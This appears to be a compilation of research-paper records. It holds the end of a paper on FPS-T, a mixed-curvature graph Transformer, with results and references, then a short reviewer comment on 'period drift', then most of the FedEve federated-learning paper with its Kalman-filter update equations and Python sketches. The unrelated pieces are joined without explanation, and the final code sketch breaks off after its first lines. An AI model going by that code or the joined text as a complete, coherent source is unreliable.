| Q-GCN | 56.22±4.38 | 55.68±5.59 | 46.60±2.41 | 26.39±0.60 | 82.58±3.70 | 54.06±4.45 | 68.61±3.05 | 73.70±0.69 | 10.3 |
| FPS-T | 51.35±3.44 | 55.95±2.85 | 52.80±2.20 | 28.18±0.55 | 91.39±1.05 | 66.15±0.45 | 77.13±0.59 | 79.63±0.57 | 8.25 |

5.2 NODE CLASSIFICATION

**Datasets.** For node classification, we experiment on eight different networks: three WebKB networks (TEXAS, CORNELL, WISCONSIN) that connect web-pages via hyperlinks (Craven et al., 1998), a co-occurrence network from Wikipedia pages related to English films (ACTOR) (Tang et al., 2009), three citation networks (CITESEER, PUBMED, CORA) (Sen et al., 2008), and an airline network (AIRPORT) (Chami et al., 2019). These networks are chosen to test our approach under a wide spectrum of graph homophily $H(G)$, which measures the ratio of edges connecting nodes that share the same label (Zhu et al., 2020a). In other words, a heterophilic graph with small graph homophily requires capturing long-range interactions for proper labeling, which is naturally difficult for message passing-based approaches with small receptive fields. More detailed statistics on the networks can be found in Appendix D.

**Training.** For all methods, we fix the embedding dimension to 16 and train each model to minimize the cross-entropy loss using an Adam optimizer with a learning rate of $10^{-2}$. For models that use learnable curvatures (i.e., HGCN, κ-GCN, and FPS-T), we use a learning rate of $10^{-4}$ for the curvatures. The optimal number of layers, activation function, dropout rate, and weight decay of each method are chosen via grid search on each dataset. Details on the hyperparameter search space and dataset splits can be found in Appendix E.2.

**Results.** Table 2 shows the results from node classification. Overall, our method attains the best accuracy on 6 out of 8 datasets, showing that FPS-T is effective across networks with various graph homophily. In the case of heterophilic networks, we find that the small receptive fields of message-passing GCNs are extremely inadequate, often being outperformed by a simple MLP that completely ignores the graph connectivity. On the other hand, FPS-T consistently outperforms the MLP as well as the GCN baselines, due to its ability to exchange information across long distances via global attention.
It also significantly outperforms TOKENGT by 8.3% on Actor, showing that adjusting the geometry towards non-Euclidean can further enhance predictive performance. In homophilic networks where message-passing is more well-suited, FPS-T shows competitive performance against GCN baselines. This is expected as FPS-T enjoys the same capacity as TOKENGT to mimic any order-2 equivariant bases (Kim et al., 2022), which includes local message-passing, through attention score computation. 6 CONCLUSION We propose FPS-T, a natural generalization of the Transformer architecture towards mixed-curvature spaces with learnable curvatures. When combined with the graph tokenization technique of Kim et al. (2022), our model can embed graphs with less distortion and higher parameter-efficiency than its Euclidean counterpart by operating on the product-stereographic model. We also show that our model outperforms existing hyperbolic and mixed-curvature message-passing GCN baselines on node classification via global-attention that can capture long-range interactions. By linearizing the cost of self-attention through kernelized approximation, FPS-T runs in cost linear to the number of nodes and edges, allowing practical use on large-scale networks. For future work, we plan to extend towards heterogeneous manifolds (Giovanni et al., 2022) with input-dependent sectional curvatures and also optimize Riemannian operations towards better stability and efficiency under finite precision. As we propose a foundational generalization of the Transformer architecture, investigating what geometry suits best for various tasks in the NLP and CV domain would also be an interesting direction. REFERENCES Uri Alon and Eran Yahav. On the bottleneck of graph neural networks and its practical implications. *arXiv preprint arXiv:2006.05205*, 2020. Gregor Bachmann, Gary Bécigneul, and Octavian Ganea. Constant curvature graph convolutional networks. In *International Conference on Machine Learning*, pp. 486–496. PMLR, 2020. Tom Brown, Benjamin Mann, Nick Ryder, Melanie Subbiah, Jared D Kaplan, Prafulla Dhariwal, Arvind Neelakantan, Pranav Shyam, Girish Sastry, Amanda Askell, et al. Language models are few-shot learners. *Advances in neural information processing systems*, 33:1877–1901, 2020. Chen Cai and Yusu Wang. A note on over-smoothing for graph neural networks. *arXiv preprint arXiv:2006.13318*, 2020. Ines Chami, Zhiqiao Ying, Christopher Ré, and Jure Leskovec. Hyperbolic graph convolutional neural networks. *Advances in neural information processing systems*, 32, 2019. Ara Cho, Junha Shin, Sohyun Hwang, Chanyoung Kim, Hongseok Shim, Hyojin Kim, Hanhae Kim, and Insuk Lee. WormNet v3: a network-assisted hypothesis-generating server for Caenorhabditis elegans. *Nucleic Acids Research*, 42(W1):W76–W82, 05 2014. ISSN 0305-1048. doi: 10.1093/nar/gku367. URL https://doi.org/10.1093/nar/gku367. Sungjun Cho, Seonwoo Min, Jinwoo Kim, Moontae Lee, Honglak Lee, and Seunghoon Hong. Transformers meet stochastic block models: Attention with data-adaptive sparsity and cost. *arXiv preprint arXiv:2210.15541*, 2022. Krzysztof Choromanski, Valerii Likhosherstov, David Dohan, Xingyou Song, Andreea Gane, Tamas Sarlos, Peter Hawkins, Jared Davis, Afroz Mohiuddin, Lukasz Kaiser, et al. Rethinking attention with performers. *arXiv preprint arXiv:2009.14794*, 2020. Mark Craven, Andrew McCallum, Dan PiPasquo, Tom Mitchell, and Dayne Freitag. Learning to extract symbolic knowledge from the world wide web. 
Technical report, Carnegie Mellon University, School of Computer Science, Pittsburgh, PA, 1998. Calin Cruceru, Gary Bécigneul, and Octavian-Eugen Ganea. Computationally tractable riemannian manifolds for graph embeddings. In *Proceedings of the AAAI Conference on Artificial Intelligence*, volume 35, pp. 7133–7141, 2021. Michaël Defferrard, Martino Milani, Frédérick Gusset, and Nathanaël Perraudin. Deepsphere: a graph-based spherical cnn. In *International Conference on Learning Representations*, 2020. URL https://openreview.net/forum?id=Ble3OlStPB. Cheng Deng, Fan Xu, Jiaxing Ding, Luoyi Fu, Weinan Zhang, and Xinbing Wang. Fmgnn: Fused manifold graph neural network. *arXiv preprint arXiv:2304.01081*, 2023. Jacob Devlin, Ming-Wei Chang, Kenton Lee, and Kristina Toutanova. Bert: Pre-training of deep bidirectional transformers for language understanding. *arXiv preprint arXiv:1810.04805*, 2018. Alexey Dosovitskiy, Lucas Beyer, Alexander Kolesnikov, Dirk Weissenborn, Xiaohua Zhai, Thomas Unterthiner, Mostafa Dehghani, Matthias Minderer, Georg Heigold, Sylvain Gelly, et al. An image is worth 16x16 words: Transformers for image recognition at scale. *arXiv preprint arXiv:2010.11929*, 2020. Vijay Prakash Dwivedi and Xavier Bresson. A generalization of transformer networks to graphs. *arXiv preprint arXiv:2012.09699*, 2020. Vijay Prakash Dwivedi, Ladislav Rampášek, Michael Galkin, Ali Parviz, Guy Wolf, Anh Tuan Luu, and Dominique Beaini. Long range graph benchmark. *Advances in Neural Information Processing Systems*, 35:22326–22340, 2022. Jiarui Feng, Yixin Chen, Fuhai Li, Anindya Sarkar, and Muhan Zhang. How powerful are k-hop message passing graph neural networks. *arXiv preprint arXiv:2205.13328*, 2022.
HSESApr9r7
The so-called ``period drift'' comes from the stochastic sampling of clients. If we see sampling clients as sampling data in SGD, such a period drift also happens during SGD -- each batch of data has a distinct data distribution from other batches. The authors should provide a more rigorous definition of period drift and show how period drift harms training.
FedEve: On Bridging the Client Drift and Period Drift for Cross-device Federated Learning

Anonymous authors
Paper under double-blind review

Abstract

Federated learning (FL) is a machine learning paradigm that allows multiple clients to collaboratively train a shared model without exposing their private data. Data heterogeneity is a fundamental challenge in FL, which can result in poor convergence and performance degradation. Client drift has been recognized as one of the factors contributing to this issue, resulting from the multiple local updates in FEDAVG. However, in cross-device FL, a different form of drift arises due to partial client participation, and it has not been well studied. This drift, referred to as period drift, occurs because the clients participating at each communication round may exhibit a data distribution that deviates from that of all clients. It could be more harmful than client drift since the optimization objective shifts with every round. In this paper, we investigate the interaction between period drift and client drift, finding that period drift can have a particularly detrimental effect on cross-device FL as the degree of data heterogeneity increases. To tackle these issues, we propose a predict-observe framework and present an instantiated method, FedEve, where these two types of drift can compensate for each other to mitigate their overall impact. We provide theoretical evidence that our approach can reduce the variance of model updates. Extensive experiments demonstrate that our method outperforms alternatives on non-iid data in cross-device settings.

1 Introduction

Federated learning is a decentralized machine learning approach that enables multiple clients to collaboratively train a shared model without exposing their private data [McMahan et al., 2017]. In this paradigm, each client independently trains a local model using its own data and subsequently sends the model updates to a central server. The server then periodically aggregates these updates to improve the global model until it reaches convergence. There are two primary settings in FL: cross-silo and cross-device [Kairouz et al., 2021]. Cross-silo FL typically involves large organizations (a small number of clients), where most clients actively participate in every round of training [Chen and Chao, 2021; Lin et al., 2020]. In contrast, cross-device FL focuses on scenarios like smartphones (a huge number of clients, e.g., millions), where only a limited number of clients participate in each round [Li et al., 2020b; Reddi et al., 2020], due to communication bandwidth, client availability, and other issues. This paper primarily focuses on the cross-device setting with partial client participation, since we discover and then solve its unique challenge, "period drift".

Distinguished from traditional distributed optimization, the statistical heterogeneity of data has been acknowledged as a fundamental challenge in FL [Li et al., 2020a; Chen and Chao, 2021; Lin et al., 2020]. This data heterogeneity refers to the violation of the independent and identically distributed (iid) data assumption across clients (i.e., non-iid data), which can result in poor convergence and performance degradation when using FEDAVG. Client drift is recognized as one of the factors contributing to this issue and has attracted numerous efforts to address it [Karimireddy et al., 2021; Li et al., 2020b; Reddi et al., 2020].
This phenomenon is characterized by clients that, after multiple local updates, progress too far towards minimizing their local objective and consequently diverge from the shared direction. However, in cross-device FL, a different form of drift exists that can be more detrimental to the training process than client drift and has not been extensively studied. This drift occurs periodically as different clients participate in each communication round: the participating clients, as a group, may exhibit a data distribution that deviates from the overall distribution of all clients. This deviation can lead to slow and unstable convergence, as the optimization objective shifts with every round. For simplicity, we refer to this phenomenon as period drift. Although both period drift and client drift are rooted in data heterogeneity, they stem from different causes (as illustrated in Figure 1). Client drift results from multiple local updates on non-iid data, while period drift arises from partial client participation under non-iid data. The combined effect of period drift and client drift further complicates the process of reaching stable and efficient convergence and makes it more challenging in cross-device FL. In this paper, we first investigate the impact of period drift and client drift, finding that period drift can have a particularly detrimental effect on cross-device FL as the degree of data heterogeneity increases (as demonstrated in detail in Section 4.2). While the impacts of period drift and client drift are additive, we fortunately uncover a cooperative mechanism whereby these two types of drift can compensate each other to mitigate their overall impact. To achieve this, we propose a predict-observe framework, where at each round we consider 1) the server optimization (e.g., momentum) as a prediction of an update step of FL, and 2) the clients' optimization (e.g., local SGD) as an observation of this update step. Note that vanilla FedAvg is a special case in which the server does not make any predictions and relies solely on the observation provided by the clients. In this framework, period drift and client drift are viewed as the noise associated with the prediction and the observation, respectively. We thereby incorporate a Bayesian filter to integrate the prediction (with period drift) and the observation (with client drift) to achieve a better estimation of the update step and reduce uncertainty. Based on the predict-observe framework, we present an instantiated method, referred to as FedEve, which combines the prediction and the observation through linear interpolation. The coefficient of this linear combination indicates the relative confidence between prediction and observation; it is determined by the variances of the period drift and the client drift, and thus produces a more precise estimation of updates. FedEve does not increase client storage or communication costs and does not introduce additional hyperparameter tuning, making it ideal for cross-device FL. Contributions We summarize the primary contributions of this paper as follows: • We analyze the impact of period drift and client drift in cross-device FL, and observe that period drift has a particularly detrimental effect as the degree of data heterogeneity increases. • We propose a predict-observe framework for cross-device FL that incorporates a Bayesian filter to integrate server optimization and clients' optimization so that period drift and client drift can compensate for each other.
• As an instantiation of the proposed framework, we present FedEve, which combines prediction and observation through linear interpolation based on the variances of the period drift and client drift. • We provide theoretical evidence within our framework that FedEve can reduce the variance of model updates. Extensive experiments demonstrate that our method outperforms alternatives on non-iid data in cross-device settings. 2 RELATED WORKS Many works have attempted to address the non-iid problem in federated learning. FedAvg, first presented by McMahan et al. (2017), has been demonstrated to have convergence issues when working with non-iid data. Zhao et al. (2018) characterize the non-iid trap as weight divergence, which can be reduced by sharing a small set of data. However, in the traditional federated setting, data sharing violates the principle of data privacy. Karimireddy et al. (2021) highlight the phenomenon of "client drift" that occurs when data is heterogeneous (non-iid), and use control variates to address this problem. However, using Scaffold in cross-device FL may not be effective, as it requires clients to maintain the control variates, which may become outdated and negatively impact performance. Li et al. (2020b) propose FedProx, which utilizes a proximal term to deal with heterogeneity.\(^1\) In addition to these works, some research has noticed the presence of period drift, but has not specifically addressed it in the analysis. For example, Cho et al. (2022) and Fraboni et al. (2023) investigate the problem of biased client sampling and propose a sampling strategy that selects clients with large loss. However, active client sampling can alter the overall data distribution through non-random client participation, which raises concerns about fairness. Similarly, Yao et al. (2019) propose a meta-learning-based method for unbiased aggregation, but it requires training the global model on a proxy dataset, which may not be feasible in scenarios where such a dataset is unavailable. Zhu et al. (2022) observe that the data on clients have periodically shifting distributions that change with the time of day, and model them using a mixture of distributions that gradually shifts between daytime and nighttime modes. Guo et al. (2021) study the impact of time-evolving heterogeneous data in real-world scenarios and address it in a continual learning framework. Although these two papers define similar terms, they focus on the case of client data changing over time. In contrast, in this paper we find that even if the distribution of client data remains unchanged, period drift can seriously affect the convergence of FL. \(^1\)For a smoother reading experience, please feel free to check out our reading guide in Appendix A. 3 METHODOLOGY In this section, we discuss the problems of existing methods (e.g., FedAvg) in cross-device FL, and then propose our predict-observe framework and the FedEve method to deal with them. 3.1 TYPICAL FEDERATED LEARNING SETUP Federated learning, as described by McMahan et al. (2017), involves utilizing multiple clients and a central server to optimize the overall learning objective. The goal is to minimize the following objective function: $$\min_w f(w) = \sum_{k=1}^{N} p_k F_k(w) = \mathbb{E}_k[F_k(w)],$$ (1) where $N$ is the number of clients, $p_k \geq 0$, and $\sum_k p_k = 1$.
In general, the global objective is the expectation of the local objectives over different data distributions $D_k$, i.e., $F_k(w) = \mathbb{E}_{x_k \sim D_k}[f_k(w; x_k)]$, with $n_k$ samples on each client $k$ and weights $p_k$. We set $p_k = \frac{n_k}{n}$, where $n = \sum_k n_k$ is the total number of data points. In the deep learning setting, $F_k(w)$ is often non-convex. A common approach to solving objective (1) in federated settings is FedAvg (McMahan et al., 2017). In cross-device FL, a small subset $S_t$ ($|S_t| \ll N$) of all clients is selected at each round (ideally randomly, but possibly biased in practice), and the server broadcasts its global model to the selected clients. In parallel, each of the selected clients runs SGD on its own loss function $F_k(\cdot)$ for $E$ epochs and sends the resulting model to the server. The server then updates its global model as the average of these local models and repeats this process until convergence. One problem of FL is the non-iid data across clients, which can bring about "client drift" in the updates of each client, resulting in slow and unstable convergence (Karimireddy et al., 2021). Despite efforts to address the problem of client drift (Karimireddy et al., 2021; Li et al., 2020b; Reddi et al., 2020), there is a lack of research on the issue of period drift, i.e., the data distribution of the clients selected at each round may differ from the overall data distribution of all clients. Period drift, along with client drift, can greatly impact the convergence of the learning process in FL; thus, we propose a predict-observe framework to deal with them. 3.2 THE IMPACT OF DRIFT In contrast to conventional distributed optimization, federated learning possesses distinct characteristics, such as client sampling, multiple local epochs, and non-iid data distributions. These attributes may lead to a drift in the updates of the global model, resulting in suboptimal performance. This drift can be thought of as a noise term that is added to the true optimization state during the optimization process. Thus, we make the following assumption: **Assumption 3.1.** The aggregated model parameters on the server, $w_{\text{server}}$, can be represented as the sum of the optimal parameters $w^*$ and a drift (noise) term that follows a normal distribution $w_{\text{drift}} \sim \mathcal{N}(0, \sigma^2_{\text{drift}})$: $$w_{\text{server}} = w^* + w_{\text{drift}},$$ (2) where $w^*$ represents the optimal parameters obtained through stochastic gradient descent (SGD), and $w_{\text{drift}}$ represents the noise term caused by factors such as client sampling, multiple local epochs, and non-iid data distributions, which we assume to be normally distributed. Consequently, the aggregated model parameters also follow a normal distribution, $w_{\text{server}} \sim \mathcal{N}(w^*, \sigma_{\text{drift}}^2)$, with the expectation of the aggregated model parameters equal to the optimal parameters, i.e., $\mathbb{E}[w_{\text{server}}] = w^*$. Note that the assumption of Gaussian-like noise is natural, and its justification can be found in Appendix A.2.
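For reference, the following is a minimal sketch of the FedAvg round described in Section 3.1. The `local_sgd` helper and the client dictionaries are hypothetical placeholders for illustration, not part of the paper:

```python
import numpy as np

def fedavg_round(w_global, clients, sample_size, local_sgd, rng=np.random):
    """One FedAvg round with partial participation. `local_sgd(w, client)`
    is assumed to run E local epochs on the client's data and return the
    resulting weights (a float numpy array, same shape as w_global)."""
    selected = rng.choice(len(clients), size=sample_size, replace=False)
    n_total = sum(clients[k]["n_samples"] for k in selected)
    w_new = np.zeros_like(w_global)
    for k in selected:
        w_k = local_sgd(w_global.copy(), clients[k])          # local update
        w_new += (clients[k]["n_samples"] / n_total) * w_k    # p_k-weighted average
    return w_new
```

Because `selected` is a small random subset, the weighted average above optimizes the objective of the sampled clients rather than objective (1), which is exactly the source of period drift discussed next.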
To investigate the effect of this deviation on performance in FL, we utilize a quadratic regression objective as in previous studies, such as Zhang et al. (2019) and Wu et al. (2018): \[ \hat{\mathcal{L}}(w) = \frac{1}{2} (w + w_{\text{drift}})^T A (w + w_{\text{drift}}), \] where $w_{\text{drift},i} \sim \mathcal{N}(0, \sigma_i^2)$ is the drift caused by the characteristics of FL and $A$ is assumed diagonal with entries $a_i$. The generalization error can therefore be formulated as: \[ \mathcal{L}(w_t) = \mathbb{E}\left[\hat{\mathcal{L}}(w_t)\right] = \frac{1}{2}\,\mathbb{E}\left[\sum_i a_i \left(w_i^t + w_{\text{drift},i}\right)^2\right] = \frac{1}{2} \sum_i a_i \left(\mathbb{E}\left[w_i^t\right]^2 + \mathbb{V}\left[w_i^t\right] + \sigma_i^2\right). \] In the context of FL, the generalization error can thus be decomposed into three components: bias, variance, and noise. The noise component is further influenced by factors such as client sampling, multiple local epochs, and non-iid data distributions, leading to a much larger overall generalization error compared to standard stochastic gradient descent. Thus, our goal is to reduce the variance of the drift, $\sigma^2$, in order to improve both the convergence and the performance of the model. By reducing the variance of the drift, we can ensure that the updates made to the model are more consistent and accurate, leading to better overall performance (a small numerical check of this decomposition is given at the end of this subsection). The subsequent sections investigate the influence of drift on both the server and the client side with respect to this noise component in federated learning. ### 3.3 THE PREDICT-OBSERVE FRAMEWORK We first establish the concepts of period drift, represented by $Q_t$, and client drift, represented by $R_t$, at the $t$-th communication round. We make an independence assumption concerning the two types of drift, stating that the two drifts are independent of one another. This assumption allows us to more accurately analyze the impact of each drift on the model's performance and devise methods to mitigate their effects. **Assumption 3.2.** The initial model parameters are independent of all period drifts $Q_t$ and client drifts $R_t$ at each communication round, that is, $w_0 \perp Q_0, Q_1, \cdots, Q_t$ and $w_0 \perp R_0, R_1, \cdots, R_t$. The justification and limitations of this assumption can be found in Appendix A.3. Since the clients participating in each round of cross-device FL are only a small fraction of all clients, period drift can be attributed to the discrepancy between the objective of the selected clients at each round and the overall objective. Thus, an effective prediction of updates can potentially help reduce the period drift. Analogously to Equation (2), we express the prediction of updates on the server as: \[ \hat{w}_{t+1} = g(w_t) + Q_t, \quad Q_t \sim \mathcal{N}(0, \sigma_{Q_t}^2), \quad (3) \] where $\hat{w}_{t+1}$ is the prediction model at the $(t + 1)$-th round, the output of the prediction function $g(\cdot)$ with the current model $w_t$ as input. The period drift at the $t$-th round is represented by $Q_t$ and, just like the drift in Assumption 3.1, it is assumed to follow a normal distribution $\mathcal{N}(0, \sigma_{Q_t}^2)$ with mean zero and variance $\sigma_{Q_t}^2$.
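Returning to the generalization-error decomposition above, a quick Monte-Carlo check confirms it numerically. This is a sketch under the stated assumption of a diagonal $A$; the values of $a_i$, $\sigma_i$, and the iterate $w$ are arbitrary examples:

```python
import numpy as np

rng = np.random.default_rng(0)
d = 5
a = rng.uniform(0.5, 2.0, d)        # diagonal entries of A (hypothetical)
sigma = rng.uniform(0.1, 0.5, d)    # per-coordinate drift std (hypothetical)
w = rng.normal(0.0, 1.0, d)         # a fixed model iterate w_t (so V[w_i] = 0)

# Monte-Carlo estimate of E[ 1/2 (w + w_drift)^T A (w + w_drift) ]
drift = rng.normal(0.0, sigma, size=(100_000, d))
mc = 0.5 * np.mean(np.sum(a * (w + drift) ** 2, axis=1))

# Closed form: 1/2 * sum_i a_i (E[w_i]^2 + V[w_i] + sigma_i^2), with V[w_i] = 0 here
closed = 0.5 * np.sum(a * (w ** 2 + sigma ** 2))
print(mc, closed)                   # the two values agree closely
```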
Client drift can be attributed to the phenomenon that the average of the optima of the local objectives does not align with the optimum of the averaged objective. Thus, we consider the updates provided by these clients a kind of observation of the global update. Analogously to Equation (2), we express it as: \[ \tilde{w}_{t+1} = h(\hat{w}_{t+1}) + R_t, \quad R_t \sim \mathcal{N}(0, \sigma_{R_t}^2), \quad (4) \] where $\tilde{w}_{t+1}$ is the model at the $(t + 1)$-th round, the output of the observation function $h(\cdot)$ with the prediction model $\hat{w}_{t+1}$ as input. Likewise, the client drift at the $t$-th round is represented by $R_t$ and, just like the drift in Assumption 3.1, it is assumed to follow a normal distribution $\mathcal{N}(0, \sigma_{R_t}^2)$ with mean zero and variance $\sigma_{R_t}^2$. It is clear that standard FedAvg is a special case in which there is no prediction on the server side and the update relies solely on the observations provided by the clients. Furthermore, the period drift $Q_t$ and the client drift $R_t$ are represented as noise terms incorporated into the prediction and observation functions. According to Assumption 3.2, these drifts are independent of the current model state, and the following lemma is posited: Lemma 3.3. (Independence of Noise). The noise present in the prediction and observation at each communication round is independent of the current model state; specifically, $w_t \perp Q_t$ and $w_t \perp R_t$. The complete proof of the independence of noise can be found in Appendix A.4. Equations (3) and (4) depict the prediction and the observation of updates, respectively, taking into account period drift and client drift. To reconcile the discrepancy between the prediction (including period drift) and the observation (including client drift), a Bayesian filter is introduced to allow for compensation between the two sources of drift. The prior probability of the model at round $t+1$ is represented by the prediction $P(\hat{w}_{t+1})$; by combining it with the likelihood of the observation $P(\tilde{w}_{t+1} \mid \hat{w}_{t+1})$, the posterior probability $P(\hat{w}_{t+1} \mid \tilde{w}_{t+1})$ can be calculated as the new model at the $(t + 1)$-th round, as shown in Equation (5): \[ P(w_{t+1}) := P(\hat{w}_{t+1} \mid \tilde{w}_{t+1}) = \frac{P(\tilde{w}_{t+1} \mid \hat{w}_{t+1})\, P(\hat{w}_{t+1})}{P(\tilde{w}_{t+1})}. \quad (5) \] By utilizing the Bayesian filter in our predict-observe framework, an update mechanism is implemented that first performs a prediction and then corrects the predicted model state with the observation, as described in the following procedure: \[ f^+_{w_t}(w) \overset{\text{predict}}{\Longrightarrow} f^-_{\hat{w}_{t+1}}(w) = \int_{-\infty}^{+\infty} f_{Q_t}\left[w - g(v)\right] f^+_{w_t}(v)\, dv \] \[ \overset{\text{observe}}{\Longrightarrow} f^+_{w_{t+1}}(w) = \eta_t \cdot f_{R_t}\left[\tilde{w}_{t+1} - h(w)\right] \cdot f^-_{\hat{w}_{t+1}}(w), \quad (6) \] where $f^+_{w_t}(w)$ is the posterior probability of $w_t$, $f^-_{\hat{w}_{t+1}}(w)$ is the prior probability of $w_{t+1}$, $f_{Q_t}$ is the PDF of the period drift, $f^+_{w_{t+1}}(w)$ is the posterior probability of $w_{t+1}$, $f_{R_t}$ is the PDF of the client drift, and \[ \eta_t = \left\{ \int_{-\infty}^{+\infty} f_{R_t}\left[\tilde{w}_{t+1} - h(w)\right] f^-_{\hat{w}_{t+1}}(w)\, dw \right\}^{-1}. \] By combining prediction and observation, the fused model can be estimated by taking the expectation of the posterior probability as follows: \[ w_{t+1} = \mathbb{E}\left[ f^+_{w_{t+1}}(w) \right] = \int_{-\infty}^{+\infty} w\, f^+_{w_{t+1}}(w)\, dw. \quad (7) \]
Theorem 3.4. Given Assumption 3.1 and Lemma 3.3, the fused model exhibits a smaller variance than both the prediction and the observation individually, and its mean is a linear combination weighted by the variances: \[ \mu_{\text{fused}} = \frac{\mu_1 \sigma^2_{R_t} + \mu_2 \tilde{\sigma}^2_{t+1}}{\tilde{\sigma}^2_{t+1} + \sigma^2_{R_t}}, \qquad \sigma^2_{\text{fused}} = \frac{\tilde{\sigma}^2_{t+1} \sigma^2_{R_t}}{\tilde{\sigma}^2_{t+1} + \sigma^2_{R_t}}, \quad (8) \] where $\mu_1, \mu_2, \mu_{\text{fused}}$ are the means of the prediction, the observation, and the fused model, and $\tilde{\sigma}^2_{t+1}, \sigma^2_{R_t}, \sigma^2_{\text{fused}}$ are the variances of the prediction, the client drift, and the fused model. The complete proof of the Bayesian filter can be found in Appendix A.5. The application of Bayesian filtering allows the interaction of period drift and client drift to generate a new model, which is characterized by a reduced variance compared to the individual variances of period drift and client drift, as depicted in Figure 2(a). However, the computation of the new model is challenging due to the infinite integrals in Equation (7) and in $\eta_t$, as this is a general framework for arbitrary prediction and observation functions. In the following section, we propose a specialized method to facilitate the convergence of FL. Figure 2: Illustrations of the framework and FedEve. 3.4 The FedEve Method The predict-observe framework has been proposed as a strategy for mitigating the challenges of period drift and client drift. However, it raises questions about an effective prediction method and about the variances associated with the period and client drift. In this section, we demonstrate that momentum as a server optimizer (Hsu et al., 2019; Reddi et al., 2020) can serve as an effective prediction method. Furthermore, we present a method for estimating the variances of the period drift and the client drift. We adapt the framework to a specific setting where Nesterov momentum is employed as the prediction function $g(\cdot)$, and the observation function $h(\cdot)$ is the average of the client models, the same as in FedAvg. We reformulate FedAvg in an incremental form as the starting point of our approach: \[ w_{t+1} = \sum_{k \in S_t} p_k w^k_t = w_t - \sum_{k \in S_t} p_k (w_t - w^k_t) = w_t - \sum_{k \in S_t} p_k \Delta w^k_t = w_t - \Delta w_t. \quad (9) \] This formulation facilitates the accumulation of $\Delta w_t$ as momentum on the server, which serves as a prediction of updates: the empirical value of the momentum hyperparameter $\beta = 0.9$ suggests that the direction of historical updates is likely to be maintained. We introduce Nesterov momentum and specialize $g(w_t) = w_t - \eta_g M_t$ in Equation (3) as the prediction function; additionally, we specialize $h(\hat{w}_{t+1}) = \hat{w}_{t+1} - \eta_g \Delta \tilde{w}_t$ in Equation (4) as the observation function. Thus, the predict-observe equations can be rewritten as: \[ \hat{w}_{t+1} = w_t - \eta_g M_t + Q_t, \quad (10) \] \[ \tilde{w}_{t+1} = \hat{w}_{t+1} - \eta_g \Delta \tilde{w}_t + R_t, \quad (11) \] where $M_t$ is the momentum (the accumulation of $\Delta w_t$) at the $t$-th round, $\Delta \tilde{w}_t$ is the average of the model updates in Equation (9) computed by the clients at the state $\hat{w}_{t+1}$, and $\eta_g$ is the global learning rate.
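Before specializing to the Kalman filter, the Gaussian fusion of Theorem 3.4 can be checked numerically. The sketch below uses arbitrary example values and shows the fused variance dropping below both input variances:

```python
def fuse(mu1, var1, mu2, var2):
    """Fuse prediction N(mu1, var1) and observation N(mu2, var2) per Eq. (8)."""
    mu = (mu1 * var2 + mu2 * var1) / (var1 + var2)
    var = var1 * var2 / (var1 + var2)
    return mu, var

mu, var = fuse(mu1=0.0, var1=0.4, mu2=1.0, var2=0.1)
print(mu, var)  # 0.8, 0.08 -- var < min(0.4, 0.1), mean leans toward the
                # less uncertain source (here, the observation)
```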
By assuming normal distributions for $Q_t$ and $R_t$ based on Equations (3), (4), and (5), the infinite integrals in Equation (7) and in $\eta_t$ can be solved in closed form, as detailed in Appendix A.5.2. Moreover, due to the normality, distributional forms like Equations (6) and (7) are not necessary, and only the mean and the variance are needed to describe the model update process. Since these equations are linear, the Bayesian filter can be specialized as the Kalman filter (KF). The model update process can thus be summarized as the use of the KF, represented by the following formulation: \[ \hat{w}_{t+1} = w_t - \eta_g M_t, \quad (12a) \] \[ \tilde{\sigma}^2_{t+1} = \sigma^2_t + \sigma^2_{Q_t}, \quad (12b) \] \[ K = \frac{\tilde{\sigma}^2_{t+1}}{\tilde{\sigma}^2_{t+1} + \sigma^2_{R_t}}, \quad (12c) \] \[ M_{t+1} = M_t + K(\Delta \tilde{w}_t - M_t), \quad (12d) \] \[ w_{t+1} = w_t - \eta_g M_{t+1}, \quad (12e) \] \[ \sigma^2_{t+1} = (1 - K)\,\tilde{\sigma}^2_{t+1}. \quad (12f) \] The six steps of the model update for each communication round are outlined in Equations (12a)-(12f). Equation (12a) predicts the next model state from $w_t$ using the momentum $M_t$. Equation (12b) estimates the variance of the prediction model by summing the variance of $w_t$ and that of the period drift $Q_t$; for a clear presentation, the variance of the prediction model is denoted by $\tilde{\sigma}^2$ and the variance of the fused model by $\sigma^2$. The core of our method is Equation (12c), where the Kalman gain $K$ is calculated from the ratio between the variance of the prediction, $\tilde{\sigma}^2_{t+1}$, and the variance of the observation (client drift), $\sigma^2_{R_t}$. The value of $K$ determines the relative weight of the prediction and the observation when they are combined. Equation (12d) fuses the prediction and the observation linearly, weighted by the Kalman gain $K$ from (12c). Equation (12e) updates the global model with the fused momentum $M_{t+1}$ from (12d). Equation (12f) estimates the variance of the fused model $w_{t+1}$ using $K$ from (12c) and $\tilde{\sigma}^2_{t+1}$ from (12b), which is carried over to the next communication round. It is worth noting that all these calculations are performed on the server; thus, our method retains the same communication cost as FedAvg while being compatible with cross-device FL settings. While Equations (12a)-(12f) provide an efficient and accurate method for model updates, the variance of the period drift $\sigma^2_{Q_t}$ in Equation (12b) and that of the client drift $\sigma^2_{R_t}$ in Equation (12c) remain unspecified. To address this issue, we propose an effective method for estimating both variances. The period drift, which measures the deviation from the consistency of the optimization objective at each communication round, can be quantified by the discrepancy between the prediction and the observation, i.e., by computing the variance between the momentum $M_t$ and the average of the model updates $\Delta \tilde{w}_t$. Similarly, the client drift, which represents the inconsistency of the updates made by different clients, can be estimated by computing the variance between the average of the model updates $\Delta \tilde{w}_t$ and the updates made by each individual client $\Delta \tilde{w}^k_t$. We formulate the estimation of the variances of period drift and client drift as follows: \[ \sigma_{Q_t}^2 := \frac{\sum_{i=1}^{d} (M_{t,i} - \Delta \tilde{w}_{t,i})^2}{|S_t|\, d}, \qquad \sigma_{R_t}^2 := \frac{\sum_{k \in S_t} \sum_{i=1}^{d} (\Delta \tilde{w}^k_{t,i} - \Delta \tilde{w}_{t,i})^2}{|S_t|^2\, d}, \] where $i$ indexes the model parameters and $d$ is the dimension of the model. With these estimates of the variances of period drift and client drift, the overall model update process is described in Algorithm 1 and sketched in code below.
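The following minimal sketch implements one FedEve server round, following Equations (12a)-(12f) and the drift-variance estimators above. It assumes equal client weights and that the per-client updates $\Delta \tilde{w}_t^k$, computed at the broadcast prediction of Equation (12a), are already available:

```python
import numpy as np

def fedeve_server_round(w, M, var, client_deltas, lr_g=1.0):
    """One FedEve server step (Eqs. 12a-12f). `client_deltas` holds the
    per-client updates computed at the broadcast prediction w - lr_g * M
    (Eq. 12a); equal client weights are assumed for simplicity."""
    m, d = len(client_deltas), w.size
    delta = np.mean(client_deltas, axis=0)                    # observation
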